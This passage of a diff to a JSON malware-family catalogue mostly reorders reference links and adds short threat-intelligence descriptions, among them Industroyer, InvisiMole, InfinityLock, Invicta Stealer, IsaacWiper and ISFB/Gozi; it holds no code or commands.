"https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america" ], "synonyms": [], "type": [] @@ -28831,8 +30197,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.incontroller", - "https://www.mandiant.com/resources/blog/cyber-operations-russian-vulkan", - "https://twitter.com/silascutler/status/1514366443277766656" + "https://twitter.com/silascutler/status/1514366443277766656", + "https://www.mandiant.com/resources/blog/cyber-operations-russian-vulkan" ], "synonyms": [], "type": [] @@ -28882,31 +30248,31 @@ "value": "Industrial Spy" }, { - "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.", + "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer", - "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.secureworks.com/research/threat-profiles/iron-viking", - "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", - "https://cert.gov.ua/article/39518", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", - "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", - "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", - "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", - "https://en.wikipedia.org/wiki/Industroyer", - "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://en.wikipedia.org/wiki/Industroyer", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", - "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too" + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://cert.gov.ua/article/39518", + "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/" ], "synonyms": [ "Crash", @@ -28922,28 +30288,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2", - "https://twitter.com/silascutler/status/1513870210398363651", - "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", "https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/", - "https://blog.scadafence.com/industroyer2-attack", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://cert.gov.ua/article/39518", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure", - "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", - "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://twitter.com/silascutler/status/1513870210398363651", + "https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/", + "https://pylos.co/2022/04/23/industroyer2-in-perspective/", "https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf", "https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks", - "https://pylos.co/2022/04/23/industroyer2-in-perspective/" + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://www.mandiant.com/resources/blog/gru-disruptive-playbook", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure", + "https://blog.scadafence.com/industroyer2-attack", + "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html", + "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", + "https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://cert.gov.ua/article/39518", + "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/" ], "synonyms": [], "type": [] @@ -28964,6 +30331,19 @@ "uuid": "7638ac2e-0cdc-4101-8e3d-54b7b74a9c92", "value": "Inferno" }, + { + "description": "InfinityLock ransomware is a type of malicious software that encrypts a victim's files and demands a ransom payment in order to decrypt them. It is spread through phishing emails and malicious websites. Once a computer is infected with InfinityLock, it encrypts all important files, such as documents, photos, and videos. It then displays a message that demands the victim pay a ransom of $1,000 in Bitcoin in order to decrypt the files. If the victim does not pay the ransom, the files will be lost permanently.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.infinitylock", + "https://anti-spyware-101.com/remove-infinitylock-ransomware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "37fca614-e29a-4029-8afd-d3de61aa3ba0", + "value": "InfinityLock" + }, { "description": "Ransomware.", "meta": { @@ -28982,15 +30362,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", - "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", - "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", - "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", + "https://cloud.tencent.com/developer/article/1738806", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/", - "https://cloud.tencent.com/developer/article/1738806", + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", - "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", + "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" ], "synonyms": [ "Foudre" @@ -29052,19 +30432,32 @@ "uuid": "fa022849-248c-4620-86b4-2a36c704b288", "value": "Interception (Windows)" }, + { + "description": "According to Cyble, The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.invicta_stealer", + "https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00a078bf-90db-4275-b7bd-0da757dd2284", + "value": "Invicta Stealer" + }, { "description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", - "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", - "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/" + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" ], "synonyms": [], "type": [] @@ -29087,13 +30480,13 @@ "value": "Ironcat" }, { - "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.", + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" ], "synonyms": [], @@ -29116,36 +30509,36 @@ "value": "IronNetInjector" }, { - "description": "", + "description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim\u2019s machine.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper", - "https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", - "https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf", - "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", - "https://twitter.com/ESETresearch/status/1521910890072842240", - "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/", "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", - "https://www.brighttalk.com/webcast/15591/534324", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", + "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/", - "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/" + "https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html", + "https://twitter.com/ESETresearch/status/1521910890072842240", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/", + "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", + "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", + "https://www.brighttalk.com/webcast/15591/534324", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf" ], "synonyms": [ "LASAINRAW" @@ -29160,100 +30553,106 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", - "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", - "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", - "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle", - "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", - "https://blog.group-ib.com/gozi-latest-ttps", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", - "https://www.tgsoft.it/files/report/download.asp?id=568531345", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", - "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/", - "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", - "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", - "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", - "https://github.com/mlodic/ursnif_beacon_decryptor", - "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy", - "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://www.youtube.com/watch?v=KvOpNznu_3w", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", - "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/", - "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work", - "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif", - "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", - "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", - "https://redcanary.com/resources/webinars/deep-dive-process-injection/", - "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/", - "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks", "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef", - "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html", - "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", - "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", - "http://benkow.cc/DreambotSAS19.pdf", + "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/", + "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/", + "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://www.tgsoft.it/files/report/download.asp?id=7481257469", - "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", - "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", + "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", + "https://www.youtube.com/watch?v=KvOpNznu_3w", + "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", + "https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", + "https://www.cyberbit.com/new-ursnif-malware-variant/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://github.com/mlodic/ursnif_beacon_decryptor", + "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/", + "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", + "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://lokalhost.pl/gozi_tree.txt", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", + "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/", + "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work", + "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + 